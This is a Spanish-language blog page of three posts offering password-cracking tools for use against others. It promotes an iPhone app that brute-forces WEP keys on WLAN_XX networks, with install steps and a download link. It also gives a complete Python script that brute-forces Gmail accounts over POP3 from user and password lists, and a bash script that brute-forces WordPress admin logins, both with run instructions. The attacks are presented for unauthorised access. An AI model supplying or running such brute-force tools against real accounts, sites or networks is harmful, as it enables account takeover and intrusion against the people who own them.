kernelpanic.org.mx

Cuando se tiene un dispositivo móvil que permite conexión inalámbrica siempre deseamos tener a la mano alguna herramienta que nos permita conectarnos a estas redes que encontramos protegidas, iWep es una aplicación para el iPhone y el iPod Touch que nos permite conectarnos a redes con seguridad WEP habilitada.

iWep realiza un ataque de fuerza bruta contra la protección WEP de la red inalámbrica, probando de manera secuencial diferentes combinaciones de letras y números hasta obtener la contraseña, aunque todavía se encuentra en estado beta y solo soporta de momento redes del tipo WLAN_XX con BSSID 00:02:CF, es totalmente funcional; El tiempo que tarda en obtener la contraseña de la red inalámbrica es directamente proporcional a la longitud y complejidad de la misma.

REQUERIMIENTOS PREVIOS:

• iPhone/iPodTouch Jailbreaked con OS versión 2.2 y en adelante. (Para el iTouch no estoy seguro)
• MobileInstallation Patch Versión:2.2.1 (En Cydia gratis).
• Libpcap y libnet (En Cydia gratis).
• iTunes (Yo tengo la versión 8.0.0.35)
• Archivo iWepBeta.ipa http://www.4shared.com/file/103062602/3dbc8e7b/iwepBeta.html

COMO INSTALAR MOBILEINSTALATION PATCH:

Para poder instalar aplicaciones .IPA necesitamos modificar el MobileInstalation, para ello necesitamos tener el iPhone con JailBreak con Cydia instalado.
La forma sencilla de modificar el MobileInstalation es vía Cydia y una aplicación que nos modifica sea cual sea nuestra versión incluida la 2.2.

1. Ejecutar Cydia.
2. Pulsar en el icono “Manage” en el menú de abajo (el que parece un librito)
3. Pinchamos en “Sources”
4. Pinchamos en el botón “Edit” arriba a la derecha
5. Ahora aparece un botón arriba a la izquierda que pone “Add”, pinchamos
6. Sale una ventana para añadir una dirección y añadimos esta dirección: http://iphone.org.hk/apt/
7. Y pulsamos en “Add Source”.
8. Después de instalar esta fuente pinchamos en el icono “Sections” en el menú de abajo (es un circulo con una flecha hacia abajo)
9. Bajamos hasta que ponga “Tweaks” y pinchamos para entrar.
10. uscamos “MobileInstallation Patch” y la instalamos
11. IMPORTANTE: reinciamos el iPhone (mantenemos pulsado el botón de inicio y reiniciamos)
12. Una vez reiniciado el iPhone nos vamos al iTunes y en la iTunes Store nos bajamos una aplicación o Juegos

Ahora ya podemos instalar aplicaciones o juegos .IPA simplemente dando doble click sobre el fichero que se instalaran en el iTunes en la sección “Aplicaciones” debajo de la Biblioteca y se pasarán al iPhone al sincronizar.

INSTALACIÓN

• Conecta el iPhone al PC y arranca iTunes si este no lo hace solo.
• Una vez conectado y detectado por iTunes, selecciona la sección Aplicaciones de tu Biblioteca.
• Arrastra el archivo “iWepBeta.ipa” descargado anteriormente a la ventana de aplicaciones de iTunes.
• Por último, aseguraté de que la aplicación está seleccionada en la ventana de aplicaciones del iPhone. Esto lo puedes ver en DISPOSITIVOS-> Nombre de tu iPhone/iPod-> Aplicaciones. Si no está seleccionado “iWep”, hazlo tu mismo.
• Cuando esté seleccionado, solo queda sincronizar.
• Si todo ha ido bien, en este momento, deberías tener instalado “iWep” en tu iPhone/iPod.

ESPECIFICACIONES:

El principal fin de la publicación de la versión Beta de la aplicación es la de intentar depurar los posibles errores de la aplicación. Por ello se ruega encarecidamente que los fallos que se encuentren se reporten en este hilo.

(1) [iWep] iPhone/iPodTouch Beta v0.1
(2) Sólo se admiten redes WLAN_XX con BSSID 00:02:CF
(3) El tiempo de proceso entre KEYS es de 1.5 segundos.

Para Mas Información:
[iWep] Aplicacion iPhone/iPodTouch para WLAN_XX (BETA 0.1)

via: dragonjar.org

Aqui les paso el codio en python para hacer brute force a gmail, solo necesitas hacer dos documentos uno es un archivo con el usuario que quieres atacar y el otro es el archivo del passlist.

#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “\t    Usage: ./gmailpopbrute.py <userlist> <wordlist>\n”
sys.exit(1)

server = “pop.gmail.com”
success = []

try:
users = open(sys.argv[1], “r”).readlines()
except(IOError):
print “[-] Error: Check your userlist path\n”
sys.exit(1)

try:
words = open(sys.argv[2], “r”).readlines()
except(IOError):
print “[-] Error: Check your wordlist path\n”
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = “No Response”
pass

print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “[+] Server:”,server
print “[+] Port: 995″
print “[+] Users Loaded:”,len(users)
print “[+] Words Loaded:”,len(words)
print “[+] Server response:”,welcome,”\n”

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words,  1)
words.remove(value[0])

else:
print “[-] Reloading Wordlist – Changing User\n”
reloader()
value = random.sample(words,  1)
users.remove(users[0])

lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]

class Worker(threading.Thread):

def run(self):
value, user = getword()
user = user.replace(“\n”,”")
value = value.replace(“\n”,”")

try:
print “-”*12
print “[+] User:”,user,”Password:”,value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print “\t\t\n\nLogin successful:”,user, value
print “\t\tMail:”,pop.stat()[0],”emails”
print “\t\tSize:”,pop.stat()[1],”bytes\n\n”
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print “An error occurred:”, msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print “\n\n[+] Login successful:”,success[0], success[1]
print “\t[+] Mail:”,success[2],”emails”
print “\t[+] Size:”,success[3],”bytes\n”
print “\n[-] Done”

——————————————————————————————————————————————

Lo guardamos como gmailpopbrute.py y despues lo corremos.

#python gmailpopbrute.py user passlist

o bien.

#./gmailpopbrute.py user passlist

Saludos raza.

Este es un pequeño script para hacerle fuerza bruta a paguinas que usen como motor word-press, lo unico que tenemos que hacer es guardarlo en un procesador de textos despues darle permisos y por ultimo ejecutarlo. Hay que tomar en cuenta que nos pide un diccionario de passwd, en donde guardemos el pequeño script guardamos tambien nuesto diccionario de passwrds pero con el siguiente nombre bf_passwords.

#!/usr/bin/env bash
# wordpress BruteForce v1.0
# coded By 0x90 2008
# 0x90[at]bsdmail.org
#    I do not take any reponsibilty for what you do with this tool
#    Hopefully it will make your life easier rather then making other
#    peoples lives more difficult!

echo ".::WordPress BruteForce By 0x90::."
echo "use a good dictioary rename it to bf_passwords"
echo
echo -n "Enter website with full path to wordpress:
> "
 read site

n=`cat bf_passwords | wc -l`
for (( i=1; i <= $n; i++));
do
#default user is admin
password=`sed -n "$i"p bf_passwords`
b=`echo "log=admin&pwd="$password"&wp-submit=Log+In&redirect_to=wp-admin" | lynx -dump -nolist -post_data ""$site"/wp-login.php" | grep -o "Howdy, admin"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun  "
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit